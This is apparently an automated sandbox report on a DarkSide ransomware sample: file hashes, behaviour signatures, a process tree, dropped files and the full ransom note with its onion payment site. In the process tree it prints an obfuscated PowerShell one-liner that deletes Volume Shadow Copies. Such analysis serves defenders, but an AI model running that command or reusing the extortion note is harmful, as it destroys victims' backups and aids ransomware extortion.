Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    03-06-2024 20:50

General

  • Target

    00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe

  • Size

    259KB

  • MD5

    00ca7e42b298d5e2a06050b527abef40

  • SHA1

    b343760bff3f0c6adbd9b5b39e65894be6d550a5

  • SHA256

    6183d9296b128c378e32228916ec2d34fc1cee19b84bcdcf6ff8dcb2e6492a42

  • SHA512

    6e24df07d15b1dbe3da753aa6730685729490285d83397e7f140c592a45d1ecdb33c7cbd15c48bd3c4f803cff55c655f86d7523187a770a434f85f795dcba4c6

  • SSDEEP

    6144:j9Iuq5yqBxgxIlrfImRCW2cqv7pLR1N1e9ORXrP4QP:j9Ir5yOxiIlrfspjqwRLT

Malware Config

Extracted

Path

C:\Users\Admin\README.e26f79ad.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/ZPHGS4V186LJE9D41BZPQYMAVTRO61FS5DFITXN3164U5B607T7W51NEY0WV7CT1 When you open our website, put the following data in the input form: Key: jKdQRGN9mNfPP8E6f3cjkmyokpCOSXS2DnnFGEKzzUjydeJi0Y5Jwuo50cdYDeB721Qp70mHSyWcbZxtet9CL8rddRLMXV1VCor8siYPCido4knletpYGAywiyiJ6eVCeAfy21AqvcHudVyb3M7DgwYdaA7B5P3fwZkx4VmRMKn9pKP0Eethj7HsMgIC2Y3HlLGdOQT9s7bLhnLqaUrDpQ2DewShszE6NmgsWEGPQNGP7u1BOGw27hyNaH9gZV97RtPQ4PGkNdUAXopYgWbLcU5S4o4q4FdBglJsBaAtRYqE6q9lBVJhU44PdWQn7sLxr2FArxbtmaMEEfCqWstqY1naLzqnIDz7EDpPlXVbZcwGRXA9Hx42hIYVG434ppADhJV5GIyxm0boe3Sr0etwsdGvV0grUSfDez0HdBW3PpY3e7r2xiCZGEJOsNxZ7v2l5BMHZFNjyafb7BJ22v3mvvpJd3uVJPeItuGlC5sNYy0zvY9zWdMQVqD3i2l2pvi2fEKJ0ettXVghy5bjcKrGusT9FouoT7scmknYh7tVnb8zccnPxZSEt39 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/ZPHGS4V186LJE9D41BZPQYMAVTRO61FS5DFITXN3164U5B607T7W51NEY0WV7CT1

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (146) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1564
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2100

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ce50d2693482797ffeb732739f98eaa6

    SHA1

    3dcd8c05f84725956426b202c1be170f0c3b4d71

    SHA256

    4d9b4aad8a4acdcd890cbfa7ba14f839ebd116846c4198445a1b79b6a1d94cd9

    SHA512

    dd3f57aad3f6d2a55bd89add7d9df7eac4f4787879525181195e67e1885fb19a658e3e2a15c2a5839d5ec8e1982a3cc6a6f51955814b862b52ed28b41f96f48e

  • C:\Users\Admin\AppData\Local\Temp\TarF92.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    8897d3252490b592b7c784a74c0b34f3

    SHA1

    8169e18bb714cb2a1e4b59a2d6f35a665d806ee0

    SHA256

    97c9fe63d1e640cf6d796d5ee1ca0953b7c267a5367d309fb2dbbd68ef00eb99

    SHA512

    07a25972678595cdf5589d463a883ebc5761b8fccd8715e26352b7197f5e671128db4cc1d09f9b5e0657c161bd25088699665e7cfb13a50f39b446b98f4e8ec9

  • C:\Users\Admin\README.e26f79ad.TXT

    Filesize

    1KB

    MD5

    2b8c971078b833a80c3967684055ddc3

    SHA1

    e657e2ca052d0701270e3e3194e8016711da2bc6

    SHA256

    b6552686237ecece9ecbc303880abaadde34da6a31f3086b9d0782198f657ee8

    SHA512

    0f1cb2a9b3c30e106bbac81968206add8f4f00db90877c3447202ee483855e2c8b0c68bdde136604e1a8ab217a15bef11cd096ff8bf87f65e0d805df2b95f670

  • memory/1564-58-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

    Filesize

    9.6MB

  • memory/1564-56-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

    Filesize

    9.6MB

  • memory/1564-57-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

    Filesize

    9.6MB

  • memory/1564-52-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

    Filesize

    2.9MB

  • memory/1564-55-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

    Filesize

    9.6MB

  • memory/1564-53-0x00000000028E0000-0x00000000028E8000-memory.dmp

    Filesize

    32KB

  • memory/1564-51-0x000007FEF539E000-0x000007FEF539F000-memory.dmp

    Filesize

    4KB

  • memory/1564-54-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

    Filesize

    9.6MB

  • memory/2220-5-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/2220-4-0x0000000000401000-0x0000000000409000-memory.dmp

    Filesize

    32KB

  • memory/2220-7-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/2220-6-0x0000000000290000-0x0000000000291000-memory.dmp

    Filesize

    4KB

  • memory/2220-8-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/2220-0-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/2220-3-0x0000000000250000-0x000000000028B000-memory.dmp

    Filesize

    236KB

  • memory/2220-2-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/2220-244-0x0000000000250000-0x000000000028B000-memory.dmp

    Filesize

    236KB

  • memory/2220-245-0x0000000000401000-0x0000000000409000-memory.dmp

    Filesize

    32KB

  • memory/2220-243-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/2220-246-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/2220-1-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/2220-290-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB